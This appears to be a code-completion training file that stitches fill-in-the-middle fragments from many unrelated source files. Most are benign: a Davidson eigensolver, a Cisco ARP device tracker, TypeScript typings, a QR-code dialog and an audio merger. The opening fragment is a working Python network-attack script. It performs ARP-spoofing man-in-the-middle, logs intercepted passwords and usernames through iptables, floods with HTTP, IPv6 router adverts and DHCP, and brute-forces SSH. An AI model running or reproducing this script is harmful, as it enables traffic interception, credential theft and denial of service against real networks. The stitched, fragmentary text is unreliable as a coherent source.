FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'") #Log urls/web request os.popen("iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ") #Log DNS os.popen("iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'") #Log credentials HTTP os.popen("iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'") ### parser = argparse.ArgumentParser() parser.add_argument('-timeout', action='store', dest='timeout', default="none", help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed') parser.add_argument('-RA', action='store', dest='ipv6ra', default=False, help='Flood ipv6 router advertisements for given minutes') parser.add_argument('-file', action='store', dest='output', default=False, help='File output for scans') parser.add_argument('-scan', action='store', dest='scan', default=False, help='Scan the given network address or host') ##ArpScan still in betatest.. need to fix scapy responses parser.add_argument('--arpScan', action='store_true', dest='arpscan', default=False, help='Arpscan to scan fast on LAN') parser.add_argument('--syn', action='store_true', dest='syn', default=False, help='SYN Scan enabled') parser.add_argument('--service', action='store_true', dest='service', default=False, help='Service Version detection enabled') parser.add_argument('-brute', action='store', dest='brute', default="none", help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22') parser.add_argument('-mitm', action='store', dest='mitm', default="none", help='Perform MITM Attack on target') parser.add_argument('-mitmAll', action='store', dest='mitmall', default="none", help='Perform MITM Attack on all hosts') parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=False, help='Stop any Running MITM Attack') parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none", help='Deny tcp connections of given host') parser.add_argument('--dg', action='store', dest='dg', default="none", help='Perform MITM Attack with given Default Gateway') parser.add_argument('-craft', action='store', dest='packetcraft', default=False, help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80') parser.add_argument('-stress', action='store', dest='stress', default="none", help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6') results = parser.parse_args() ### Functions def httpflood(target): ip=target try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 80)) s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n Connection: Keep-Alive """) print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n Connection: Keep-Alive """ except ValueError: print "Host seems down or some connection error trying again..." ################## if not(results.output): output=str(time.time()) else: output=results.output syn="" scantype="-sn" #basic ping scan if not(results.timeout=="none"): timeout="timeout "+results.timeout+"s " print "\n\nTimeout set for seconds:"+results.timeout else: timeout="" if(results.scan): ipaddr=str(results.scan) if(results.arpscan): ##BETA TEST res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr)) output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%"))) file=open("arpscan.txt","a") print output file.write(output) file.close() else: print ipaddr if(results.syn): scantype="-sS -O" #syn and if(results.service): scantype=scantype+" -sV" scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html print scancmd print os.popen(scancmd).read() #ping scan to know online hosts if(results.ipv6ra): minutes=results.ipv6ra print "running for minutes: "+minutes #run ipv6 RA flooding for N minutes i=0 while (i <= minutes): print "Firing RAs everywhere" a = IPv6() a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast) a.display() b = ICMPv6ND_RA() b.display() c = ICMPv6NDOptSrcLLAddr() c.lladdr = "00:50:56:24:3b:c0" #MAC c.display() d = ICMPv6NDOptMTU() d.display() e = ICMPv6NDOptPrefixInfo() e.prefixlen = 64 randomhex=hex(random.randint(0, 16777215))[2:].upper() prefix=randomhex[:4] e.prefix = prefix+"::" #Global Prefix e.display() send(a/b/c/d/e) # Send the packet print "Sending IPv6 RA Packet :)" time.sleep(1) i=i+1 print i if not(results.denytcp=="none"): #Works if you are the gateway or during MITM target=results.denytcp os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &") #deny tcp traffic if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet ipnet=results.mitmall iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read() iplist=iplist.split() dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read() dgip=dgip.split()[0] print "Spoofing "+dgip+"\n\n" print "Targets: \n" for ip in iplist: print ip os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" >/dev/null 2>&1 &") os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &") EnaLogging() # Enable iptables-logging if not(results.mitm=="none"): print "im in" target=results.mitm if(results.dg=="none"): #Searches for gateway dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read() dg=dg.split()[0] print dg else: dg=results.dg #Automatically searches for gateway and arpspoof all hosts os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &") os.popen("nohup "+timeout+"urlsnarf >> visitedsites &") print "Started ARP Spoof and URL Logging" #Start ARP Spoofing with given arguments or calculated ones EnaLogging() # Enable iptables-logging print "Added temp firewall rules to log MITM traffic" if(results.packetcraft): #Packet Crafting with scapy ########### PACKET CRAFTING EXAMPLE TCP-DST192.168.1.1-SRC192.168.1.10 ########### ./boafiPenTest.py -craft TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5<|fim▁hole|> a=IP()/TCP() elif("UDP" in craft[0]): a=IP()/UDP() if("DST" in craft[1]): ipdst=craft[1].replace("DST","") a.dst=ipdst if("SRC" in craft[2]): ipsrc=craft[2].replace("SRC","") a.src=ipsrc if("DPORT" in craft[3]): dport=craft[3].replace("DPORT","") a.dport=dport n=craft[4] ##N° of packets i=0 while(i<=n): i=i+1 a.display() send(a) print "Sent packet" if not(results.stress=="none"): try: #if it can rawstring=results.stress.split("-") mode=rawstring[0] except: print "Can't parse your command" print "\nusing default DHCPv4 stress attack" mode="DHCPv4" count=20 if("DHCPv4" in mode): # DHCPv4-50 count=int(rawstring[1]) iface = "eth0" unique_hexdigits = str.encode("".join(set(string.hexdigits.lower()))) print unique_hexdigits packet = (Ether(dst="ff:ff:ff:ff:ff:ff")/ IP(src="0.0.0.0", dst="255.255.255.255")/ UDP(sport=68, dport=67)/ BOOTP(chaddr=RandString(12, unique_hexdigits))/ DHCP(options=[("message-type", "discover"), "end"])) print "Sending dhcp requests" sendp(packet,iface=iface,count=count) if("HTTP" in mode): #HTTP-192.168.1.1-500 ip=rawstring[1] count=int(rawstring[2]) i=0 while(i<=count): i=i+1 httpflood(ip) print "Finished flooding!" if not(results.brute=="none"): # file-192.168.1.254:22 # file example : usr:pass format!! cmd=results.brute ### Parsing strings to avoid errors file=cmd.split("-")[0] ip=cmd.split("-")[1] ipparsed=ip.split(":") ip=ipparsed[0].split()[0] port=int(ipparsed[1].split()[0]) #remove spaces and then int f=open(file,"r") print "Start bruteforcing "+ip+" with list: "+file for line in f: usr=line.split(":")[0].split()[0] # remove spaces if any passwd=line.split(":")[1].split()[0] #like above brute_pass(usr,passwd,ip,port) if(results.stopmitm): #Stop MITM...hosts should re-generate ARP automatically os.popen("killall arpspoof") os.popen("killall tcpkill") # TODO ## mitm --> interact with SDS to get realtime data for visualization ## metasploit attacks? ## if connected to internet send info on "cloud"(site db) ## save data on xml,csv for webGUI visualization<|fim▁end|>
craft=(results.packetcraft).split("-") if("TCP" in craft[0]):
<|file_name|>generate-enums.rs<|end_file_name|><|fim▁begin|>// Copyright 2015 Ilkka Rauta // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|> mod common; mod frontend; mod demux; fn main() { frontend::generate(); demux::generate(); }<|fim▁end|>
// See the License for the specific language governing permissions and // limitations under the License.
<|file_name|>davidson.py<|end_file_name|><|fim▁begin|>"""A block Davidson solver for finding a fixed number of eigenvalues. Adapted from https://joshuagoings.com/2013/08/23/davidsons-method/ """ import time from typing import Tuple import numpy as np from tqdm import tqdm def davidson(A: np.ndarray, k: int, eig: int) -> Tuple[np.ndarray, np.ndarray]: assert len(A.shape) == 2 assert A.shape[0] == A.shape[1] n = A.shape[0] ## set up subspace and trial vectors # set of k unit vectors as guess t = np.eye(n, k) # hold guess vectors V = np.zeros((n, n)) I = np.eye(n) for m in tqdm(range(k, mmax, k)): if m <= k: for j in range(k): V[:, j] = t[:, j] / np.linalg.norm(t[:, j]) theta_old = 1 elif m > k: theta_old = theta[:eig] V, R = np.linalg.qr(V) T = V[:, : (m + 1)].T @ A @ V[:, : (m + 1)] THETA, S = np.linalg.eig(T) idx = THETA.argsort() theta = THETA[idx] s = S[:, idx] for j in range(k): w = (A - theta[j] * I) @ V[:, : (m + 1)] @ s[:, j] q = w / (theta[j] - A[j, j]) V[:, (m + j + 1)] = q norm = np.linalg.norm(theta[:eig] - theta_old) if norm < tol: break return theta, V if __name__ == "__main__": # dimension of problem n = 1200 # convergence tolerance tol = 1e-8 # maximum number of iterations mmax = n // 2 ## set up fake Hamiltonian sparsity = 1.0e-4 A = np.zeros((n, n)) for i in range(0, n): A[i, i] = i + 1 A = A + sparsity * np.random.randn(n, n) A = (A.T + A) / 2 # number of initial guess vectors k = 8 # number of eigenvalues to solve eig = 4 start_davidson = time.time() theta, V = davidson(A, k, eig) end_davidson = time.time() print(f"davidson = {theta[:eig]}; {end_davidson - start_davidson} seconds")<|fim▁hole|> end_numpy = time.time() print(f"numpy = {E[:eig]}; {end_numpy - start_numpy} seconds")<|fim▁end|>
start_numpy = time.time() E, Vec = np.linalg.eig(A) E = np.sort(E)
<|file_name|>device_tracker.py<|end_file_name|><|fim▁begin|>"""Support for Cisco IOS Routers.""" import logging import re from pexpect import pxssh import voluptuous as vol from homeassistant.components.device_tracker import ( DOMAIN, PLATFORM_SCHEMA as PARENT_PLATFORM_SCHEMA, DeviceScanner, ) from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PORT, CONF_USERNAME import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) PLATFORM_SCHEMA = vol.All( PARENT_PLATFORM_SCHEMA.extend( { vol.Required(CONF_HOST): cv.string, vol.Required(CONF_USERNAME): cv.string, vol.Optional(CONF_PASSWORD, default=""): cv.string, vol.Optional(CONF_PORT): cv.port, } ) ) def get_scanner(hass, config): """Validate the configuration and return a Cisco scanner.""" scanner = CiscoDeviceScanner(config[DOMAIN]) return scanner if scanner.success_init else None class CiscoDeviceScanner(DeviceScanner): """This class queries a wireless router running Cisco IOS firmware.""" def __init__(self, config): """Initialize the scanner.""" self.host = config[CONF_HOST] self.username = config[CONF_USERNAME] self.port = config.get(CONF_PORT) self.password = config[CONF_PASSWORD] self.last_results = {} self.success_init = self._update_info() _LOGGER.info("Initialized cisco_ios scanner") def get_device_name(self, device): """Get the firmware doesn't save the name of the wireless device.""" return None def scan_devices(self): """Scan for new devices and return a list with found device IDs.""" self._update_info() return self.last_results def _update_info(self): """ Ensure the information from the Cisco router is up to date. Returns boolean if scanning successful. """ string_result = self._get_arp_data() if string_result: self.last_results = [] last_results = [] lines_result = string_result.splitlines() # Remove the first two lines, as they contains the arp command # and the arp table titles e.g. # show ip arp # Protocol Address | Age (min) | Hardware Addr | Type | Interface lines_result = lines_result[2:] for line in lines_result: parts = line.split() if len(parts) != 6: continue # ['Internet', '10.10.11.1', '-', '0027.d32d.0123', 'ARPA', # 'GigabitEthernet0'] age = parts[2] hw_addr = parts[3]<|fim▁hole|> if age != "-": mac = _parse_cisco_mac_address(hw_addr) age = int(age) if age < 1: last_results.append(mac) self.last_results = last_results return True return False def _get_arp_data(self): """Open connection to the router and get arp entries.""" try: cisco_ssh = pxssh.pxssh() cisco_ssh.login( self.host, self.username, self.password, port=self.port, auto_prompt_reset=False, ) # Find the hostname initial_line = cisco_ssh.before.decode("utf-8").splitlines() router_hostname = initial_line[len(initial_line) - 1] router_hostname += "#" # Set the discovered hostname as prompt regex_expression = f"(?i)^{router_hostname}".encode() cisco_ssh.PROMPT = re.compile(regex_expression, re.MULTILINE) # Allow full arp table to print at once cisco_ssh.sendline("terminal length 0") cisco_ssh.prompt(1) cisco_ssh.sendline("show ip arp") cisco_ssh.prompt(1) devices_result = cisco_ssh.before return devices_result.decode("utf-8") except pxssh.ExceptionPxssh as px_e: _LOGGER.error("Failed to login via pxssh: %s", px_e) return None def _parse_cisco_mac_address(cisco_hardware_addr): """ Parse a Cisco formatted HW address to normal MAC. e.g. convert 001d.ec02.07ab to: 00:1D:EC:02:07:AB Takes in cisco_hwaddr: HWAddr String from Cisco ARP table Returns a regular standard MAC address """ cisco_hardware_addr = cisco_hardware_addr.replace(".", "") blocks = [ cisco_hardware_addr[x : x + 2] for x in range(0, len(cisco_hardware_addr), 2) ] return ":".join(blocks).upper()<|fim▁end|>
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>/* * @license Apache-2.0 * * Copyright (c) 2019 The Stdlib Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // TypeScript Version: 2.0 /** * Evaluates the cumulative distribution function (CDF) for a uniform distribution. * * @param x - input value * @returns evaluated CDF */ type Unary = ( x: number ) => number; /** * Interface for the cumulative distribution function (CDF) of a uniform distribution. */ interface CDF { /** * Evaluates the cumulative distribution function (CDF) for a uniform distribution with minimum support `a` and maximum support `b` at a value `x`. * * ## Notes * * - If provided `a >= b`, the function returns `NaN`. * * @param x - input value * @param a - minimum support * @param b - maximum support * @returns evaluated CDF * * @example * var y = cdf( 9.0, 0.0, 10.0 ); * // returns 0.9 * * @example * var y = cdf( 0.5, 0.0, 2.0 ); * // returns 0.25 * * @example * var y = cdf( +Infinity, 2.0, 4.0 ); * // returns 1.0 * * @example * var y = cdf( -Infinity, 2.0, 4.0 ); * // returns 0.0 * * @example * var y = cdf( NaN, 0.0, 1.0 ); * // returns NaN * * @example * var y = cdf( 0.0, NaN, 1.0 ); * // returns NaN * * @example * var y = cdf( 0.0, 0.0, NaN ); * // returns NaN * * @example * var y = cdf( 2.0, 1.0, 0.0 ); * // returns NaN */ ( x: number, a: number, b: number ): number; /** * Returns a function for evaluating the cumulative distribution function (CDF) for a uniform distribution with minimum support `a` and maximum support `b`. * * @param a - minimum support * @param b - maximum support * @returns CDF * * @example * var mycdf = cdf.factory( 0.0, 10.0 ); * var y = mycdf( 0.5 ); * // returns 0.05 * * y = mycdf( 8.0 ); * // returns 0.8 */ factory( a: number, b: number ): Unary; } /** * Uniform distribution cumulative distribution function (CDF).<|fim▁hole|>* @param b - maximum support * @returns evaluated CDF * * @example * var y = cdf( 5.0, 0.0, 4.0 ); * // returns 1.0 * * var mycdf = cdf.factory( 0.0, 10.0 ); * y = mycdf( 0.5 ); * // returns 0.05 * * y = mycdf( 8.0 ); * // returns 0.8 */ declare var cdf: CDF; // EXPORTS // export = cdf;<|fim▁end|>
* * @param x - input value * @param a - minimum support
<|file_name|>data_prepper.py<|end_file_name|><|fim▁begin|>import numpy as np import jarvis.helpers.helpers as helpers from data_cleaner import DataCleaner def get_data(csv=None, sep='|'): dataset = create_dataset(csv, sep) inputs = DataCleaner().clean(dataset[:, 0:1]) outputs = format_targets(dataset[:, 1]) train_data, test_data = inputs[::2], inputs[1::2] train_targets, test_targets = outputs[::2], outputs[1::2] return [(train_data, train_targets), (test_data, test_targets)] def create_dataset(csv, sep): if csv: return helpers.read_csv(csv, sep=sep).values else: data = [] for f in helpers.csvs(): for row in helpers.read_csv(f, sep=sep).values: data.append(list(row)) return np.array(data) def format_targets(target_list): target_map = {} index = 0 actions = helpers.get_actions() # Map targets to their index inside of actions array<|fim▁hole|> return map(lambda target: target_map[target], target_list)<|fim▁end|>
for action in actions: target_map[action] = index index += 1
<|file_name|>newport_group.py<|end_file_name|><|fim▁begin|># =============================================================================== # Copyright 2011 Jake Ross # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # ============= enthought library imports ======================= from traits.api import Float, Tuple # ============= standard library imports ======================== # ============= local library imports ========================== from pychron.core.helpers.strtools import csv_to_ints from pychron.hardware.axis import Axis MAPPING = dict( acceleration="HA", deceleration="HD", # emergency_deceleration = 'HE', jerk="HJ", velocity="HV", axes="HN", ) class NewportGroup(Axis): # acceleration = Float # deceleration = Float emergency_deceleration = None jerk = Float # velocity = Float name = "GroupedAxes" machine_velocity = Float machine_acceleration = Float machine_deceleration = Float axes = Tuple # calculate_parameters = Bool(True) id = None def _set_acceleration(self, v): self._acceleration = v <|fim▁hole|> def _set_velocity(self, v): self._velocity = v def load(self, path): config = self.get_configuration(path) for attr in [ "acceleration", "deceleration", # 'emergency_deceleration', "jerk", "velocity", ]: self.set_attribute(config, attr, "General", attr, cast="float") self.set_attribute(config, "id", "General", "id", cast="int") axes = self.config_get(config, "General", "axes") self.axes = tuple(csv_to_ints(axes)) self.nominal_velocity = self.velocity self.nominal_acceleration = self.acceleration self.nominal_deceleration = self.deceleration def build_command(self, new_group): cmds = [] for key, value in MAPPING.items(): if key is not "axes": cmds.append("{}{}{:0.5f}".format(self.id, value, getattr(self, key))) if new_group: gid = "{:n}HN{}".format(self.id, ",".join(map(str, self.axes))) cmds = [gid] + cmds return ";".join(cmds) # ============= EOF ==============================================<|fim▁end|>
def _set_deceleration(self, v): self._deceleration = v
<|file_name|>qrcodedialog.cpp<|end_file_name|><|fim▁begin|>#include "qrcodedialog.h" #include "ui_qrcodedialog.h" #include "bitcoinunits.h" #include "guiconstants.h" #include "guiutil.h" #include "optionsmodel.h" #include <QPixmap> #include <QUrl> #include <qrencode.h> QRCodeDialog::QRCodeDialog(const QString &addr, const QString &label, bool enableReq, QWidget *parent) : QDialog(parent), ui(new Ui::QRCodeDialog), model(0), address(addr) { ui->setupUi(this); setWindowTitle(QString("%1").arg(address)); ui->chkReqPayment->setVisible(enableReq); ui->lblAmount->setVisible(enableReq); ui->lnReqAmount->setVisible(enableReq); ui->lnLabel->setText(label); ui->btnSaveAs->setEnabled(false); genCode(); } QRCodeDialog::~QRCodeDialog() { delete ui; } void QRCodeDialog::setModel(OptionsModel *model) { this->model = model; if (model) connect(model, SIGNAL(displayUnitChanged(int)), this, SLOT(updateDisplayUnit())); // update the display unit, to not use the default ("BTC") updateDisplayUnit(); } void QRCodeDialog::genCode() { QString uri = getURI(); if (uri != "") { ui->lblQRCode->setText(""); QRcode *code = QRcode_encodeString(uri.toUtf8().constData(), 0, QR_ECLEVEL_L, QR_MODE_8, 1); if (!code) { ui->lblQRCode->setText(tr("Error encoding URI into QR Code.")); return; } myImage = QImage(code->width + 8, code->width + 8, QImage::Format_RGB32); myImage.fill(0xffffff); unsigned char *p = code->data; for (int y = 0; y < code->width; y++) { for (int x = 0; x < code->width; x++) { myImage.setPixel(x + 4, y + 4, ((*p & 1) ? 0x0 : 0xffffff)); p++; } } QRcode_free(code);<|fim▁hole|> ui->lblQRCode->setPixmap(QPixmap::fromImage(myImage).scaled(300, 300)); ui->outUri->setPlainText(uri); } } QString QRCodeDialog::getURI() { QString ret = QString("elcoin:%1").arg(address); int paramCount = 0; ui->outUri->clear(); if (ui->chkReqPayment->isChecked()) { if (ui->lnReqAmount->validate()) { // even if we allow a non BTC unit input in lnReqAmount, we generate the URI with BTC as unit (as defined in BIP21) ret += QString("?amount=%1").arg(BitcoinUnits::format(BitcoinUnits::BTC, ui->lnReqAmount->value())); paramCount++; } else { ui->btnSaveAs->setEnabled(false); ui->lblQRCode->setText(tr("The entered amount is invalid, please check.")); return QString(""); } } if (!ui->lnLabel->text().isEmpty()) { QString lbl(QUrl::toPercentEncoding(ui->lnLabel->text())); ret += QString("%1label=%2").arg(paramCount == 0 ? "?" : "&").arg(lbl); paramCount++; } if (!ui->lnMessage->text().isEmpty()) { QString msg(QUrl::toPercentEncoding(ui->lnMessage->text())); ret += QString("%1message=%2").arg(paramCount == 0 ? "?" : "&").arg(msg); paramCount++; } // limit URI length to prevent a DoS against the QR-Code dialog if (ret.length() > MAX_URI_LENGTH) { ui->btnSaveAs->setEnabled(false); ui->lblQRCode->setText(tr("Resulting URI too long, try to reduce the text for label / message.")); return QString(""); } ui->btnSaveAs->setEnabled(true); return ret; } void QRCodeDialog::on_lnReqAmount_textChanged() { genCode(); } void QRCodeDialog::on_lnLabel_textChanged() { genCode(); } void QRCodeDialog::on_lnMessage_textChanged() { genCode(); } void QRCodeDialog::on_btnSaveAs_clicked() { QString fn = GUIUtil::getSaveFileName(this, tr("Save QR Code"), QString(), tr("PNG Images (*.png)")); if (!fn.isEmpty()) myImage.scaled(EXPORT_IMAGE_SIZE, EXPORT_IMAGE_SIZE).save(fn); } void QRCodeDialog::on_chkReqPayment_toggled(bool fChecked) { if (!fChecked) // if chkReqPayment is not active, don't display lnReqAmount as invalid ui->lnReqAmount->setValid(true); genCode(); } void QRCodeDialog::updateDisplayUnit() { if (model) { // Update lnReqAmount with the current unit ui->lnReqAmount->setDisplayUnit(model->getDisplayUnit()); } }<|fim▁end|>
<|file_name|>AudioMerger.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from pydub import * class AudioMerger: voice_tags = ["one", "two", "three", "four", "five", "ten", "RUN", "relax", "completed"] def __init__(self, music): self.music = music self.additionalGain = 8 self.voices={} for voice in self.voice_tags: sound = AudioSegment.from_file('voices/' + voice + '.wav') sound += self.additionalGain self.voices[voice] = sound def addCountdown(self, startTime, isRun = True): for i in range(1, 6): voice = self.voices[self.voice_tags[i - 1]] self.music = self.music.overlay(voice, position = (startTime - i) * 1000) self.music = self.music.overlay(self.voices["ten"], position = (startTime - 10) * 1000) voice = self.voices["RUN" if isRun else "relax"] self.music = self.music.overlay(voice, position = startTime * 1000) def addCompleted(self, startTimeSec): self.music = self.music.overlay(self.voices["completed"], position = (startTimeSec * 1000)) def exportMusic(self, fname): self.music.export(fname + ".mp3", format="mp3")<|fim▁end|>
<|file_name|>DynamicTypeClient.tsx<|end_file_name|><|fim▁begin|>import * as React from 'react' import { ifError } from '@framework/Globals'; import { ajaxPost, ajaxGet, ValidationError } from '@framework/Services'; import { SearchControl, ValueSearchControlLine } from '@framework/Search' import * as Finder from '@framework/Finder' import { EntitySettings } from '@framework/Navigator' import * as AppContext from '@framework/AppContext' import * as Navigator from '@framework/Navigator' import MessageModal from '@framework/Modals/MessageModal' import { EntityData, EntityKind, symbolNiceName } from '@framework/Reflection' import { EntityOperationSettings } from '@framework/Operations' import * as Operations from '@framework/Operations' import { NormalControlMessage } from '@framework/Signum.Entities' import * as QuickLink from '@framework/QuickLinks' import { DynamicTypeEntity, DynamicMixinConnectionEntity, DynamicTypeOperation, DynamicSqlMigrationEntity, DynamicRenameEntity, DynamicTypeMessage, DynamicPanelPermission, DynamicApiEntity } from './Signum.Entities.Dynamic' import DynamicTypeComponent from './Type/DynamicType' //typings only import * as DynamicClientOptions from './DynamicClientOptions' import * as AuthClient from '../Authorization/AuthClient' import { Tab } from 'react-bootstrap'; export function start(options: { routes: JSX.Element[] }) { Navigator.addSettings(new EntitySettings(DynamicTypeEntity, w => import('./Type/DynamicType'))); Navigator.addSettings(new EntitySettings(DynamicMixinConnectionEntity, w => import('./Type/DynamicMixinConnection'))); Navigator.addSettings(new EntitySettings(DynamicSqlMigrationEntity, w => import('./Type/DynamicSqlMigration'))); Operations.addSettings(new EntityOperationSettings(DynamicTypeOperation.Clone, { contextual: { icon: "clone", iconColor: "black" }, })); Operations.addSettings(new EntityOperationSettings(DynamicTypeOperation.Save, { onClick: eoc => { (eoc.frame.entityComponent as DynamicTypeComponent).beforeSave(); Operations.API.executeEntity(eoc.entity, eoc.operationInfo.key) .then(pack => { eoc.frame.onReload(pack); Operations.notifySuccess(); }) .then(() => { if (AuthClient.isPermissionAuthorized(DynamicPanelPermission.ViewDynamicPanel)) { MessageModal.show({ title: DynamicTypeMessage.TypeSaved.niceToString(), message: DynamicTypeMessage.DynamicType0SucessfullySavedGoToDynamicPanelNow.niceToString(eoc.entity.typeName), buttons: "yes_no", style: "success", icon: "success" }).then(result => { if (result == "yes") window.open(AppContext.toAbsoluteUrl("~/dynamic/panel")); }).done(); } }) .catch(ifError(ValidationError, e => eoc.frame.setError(e.modelState, "entity"))) .done(); }, alternatives: eoc => [], })); QuickLink.registerQuickLink(DynamicTypeEntity, ctx => new QuickLink.QuickLinkLink("ViewDynamicPanel", () => symbolNiceName(DynamicPanelPermission.ViewDynamicPanel), "~/dynamic/panel", { isVisible: AuthClient.isPermissionAuthorized(DynamicPanelPermission.ViewDynamicPanel), icon: "arrows-alt", iconColor: "purple", })); DynamicClientOptions.Options.onGetDynamicLineForPanel.push(ctx => <ValueSearchControlLine ctx={ctx} findOptions={{ queryName: DynamicTypeEntity }} />); DynamicClientOptions.Options.onGetDynamicLineForPanel.push(ctx => <ValueSearchControlLine ctx={ctx} findOptions={{ queryName: DynamicMixinConnectionEntity }} />); DynamicClientOptions.Options.getDynaicMigrationsStep = () => <> <h3>{DynamicSqlMigrationEntity.nicePluralName()}</h3> <SearchControl findOptions={{ queryName: DynamicSqlMigrationEntity }} /> <h3>{DynamicRenameEntity.nicePluralName()}</h3> <SearchControl findOptions={{ queryName: DynamicRenameEntity }} /> </>; DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicTypeEntity, t => [ { token: t.append(p => p.typeName), type: "Text" }, { token: t.append(p => p.entity.typeDefinition), type: "JSon" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicMixinConnectionEntity, t => [ { token: t.append(p => p.mixinName), type: "Text" }, { token: t.append(p => p.entity.entityType.entity!.cleanName), type: "Text" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicSqlMigrationEntity, t => [ { token: t.append(p => p.comment), type: "Text" }, { token: t.append(p => p.entity.script), type: "Code" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicRenameEntity, t => [ { token: t.append(p => p.oldName), type: "Text" }, { token: t.append(p => p.newName), type: "Text" }, { token: t.append(p => p.replacementKey), type: "Text" }, ]); } export namespace API { export function getPropertyType(property: DynamicProperty): Promise<string> { return ajaxPost({ url: `~/api/dynamic/type/propertyType` }, property); } export function expressionNames(typeName: string): Promise<Array<string>> { return ajaxGet({ url: `~/api/dynamic/type/expressionNames/${typeName}` }); } } export interface DynamicTypeDefinition { primaryKey?: DynamicTypePrimaryKeyDefinition; ticks?: DynamicTypeTicksDefinition; tableName?: string; entityKind?: EntityKind; entityData?: EntityData; operationCreate?: OperationConstruct; operationSave?: OperationExecute; operationDelete?: OperationDelete; operationClone?: OperationConstructFrom; customInheritance?: DynamicTypeCustomCode; customEntityMembers?: DynamicTypeCustomCode; customStartCode?: DynamicTypeCustomCode; customLogicMembers?: DynamicTypeCustomCode; customTypes?: DynamicTypeCustomCode; customBeforeSchema?: DynamicTypeCustomCode; queryFields: string[]; multiColumnUniqueIndex?: MultiColumnUniqueIndex; properties: DynamicProperty[]; toStringExpression?: string; } export interface DynamicProperty { uid: string; name: string; columnName?: string; type: string; columnType?: string; isNullable: string; uniqueIndex: string; isLite?: boolean; isMList?: DynamicTypeBackMListDefinition; size?: number; scale?: number; unit?: string; format?: string; notifyChanges?: boolean; _propertyType_?: string; validators?: Validators.DynamicValidator[]; customFieldAttributes?: string; customPropertyAttributes?: string; } export interface DynamicTypePrimaryKeyDefinition { name?: string; type?: string; identity: boolean; } export interface DynamicTypeTicksDefinition { hasTicks: boolean; name?: string; type?: string; } export interface DynamicTypeBackMListDefinition { tableName?: string; preserveOrder: boolean; orderName?: string; backReferenceName?: string; } export interface MultiColumnUniqueIndex { fields: string[]; where?: string; } export interface OperationConstruct { construct: string; } export interface OperationExecute { canExecute?: string; execute: string; } export interface OperationConstructFrom { canConstruct?: string; construct: string; } export interface OperationDelete { canDelete?: string; delete: string; } export interface DynamicTypeCustomCode { code?: string; } export namespace Validators { export interface DynamicValidator { type: string; } export interface NotNull extends DynamicValidator { type: 'NotNull'; disabled?: number; } export interface StringLength extends DynamicValidator { <|fim▁hole|> max?: number; allowLeadingSpaces?: boolean; allowTrailingSpaces?: boolean; } export interface Decimals extends DynamicValidator { type: 'Decimals'; decimalPlaces: number; } export interface NumberIs extends DynamicValidator { type: 'NumberIs'; comparisonType: string; number: number; } export interface CountIs extends DynamicValidator { type: 'CountIs'; comparisonType: string; number: number; } export const ComparisonTypeValues = ["EqualTo", "DistinctTo", "GreaterThan", "GreaterThanOrEqualTo", "LessThan", "LessThanOrEqualTo"]; export interface NumberBetween extends DynamicValidator { type: 'NumberBetween'; min: number; max: number; } export interface DateTimePrecision extends DynamicValidator { type: 'DateTimePrecision'; precision: string; } export interface TimeSpanPrecision extends DynamicValidator { 